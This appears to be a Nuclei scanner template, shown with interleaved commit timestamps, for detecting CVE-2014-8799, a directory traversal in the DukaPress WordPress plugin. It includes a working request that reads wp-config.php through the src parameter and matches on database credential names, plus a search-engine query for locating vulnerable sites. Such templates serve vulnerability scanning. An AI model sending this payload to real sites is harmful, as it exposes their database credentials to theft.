2021-07-27 22:03:23 +00:00
id : CVE-2014-8799
info :
name : WordPress Plugin DukaPress 2.5.2 - Directory Traversal
author : daffainfo
severity : high
2022-02-25 22:07:55 +00:00
description : A directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php.
2021-08-19 13:59:12 +00:00
reference :
2022-02-25 22:07:55 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-8799
2021-07-27 22:03:23 +00:00
- https://www.exploit-db.com/exploits/35346
2022-05-17 09:18:12 +00:00
- https://wordpress.org/plugins/dukapress/changelog/
2022-02-25 22:07:55 +00:00
classification :
2022-09-06 01:33:31 +00:00
cvss-metrics : CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
2023-04-18 02:40:53 +00:00
cvss-score : 5
2022-02-25 22:07:55 +00:00
cve-id : CVE-2014-8799
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2022-07-11 17:26:30 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-07-11 17:26:30 +00:00
google-query : inurl:"/wp-content/plugins/dukapress"
2022-08-27 04:41:18 +00:00
tags : cve,cve2014,wordpress,wp-plugin,lfi,edb
2021-07-27 22:03:23 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-27 22:03:23 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
2021-08-02 16:29:27 +00:00
- "DB_USER"
- "DB_HOST"
2021-07-27 22:03:23 +00:00
part : body
condition : and
- type : status
status :
- 200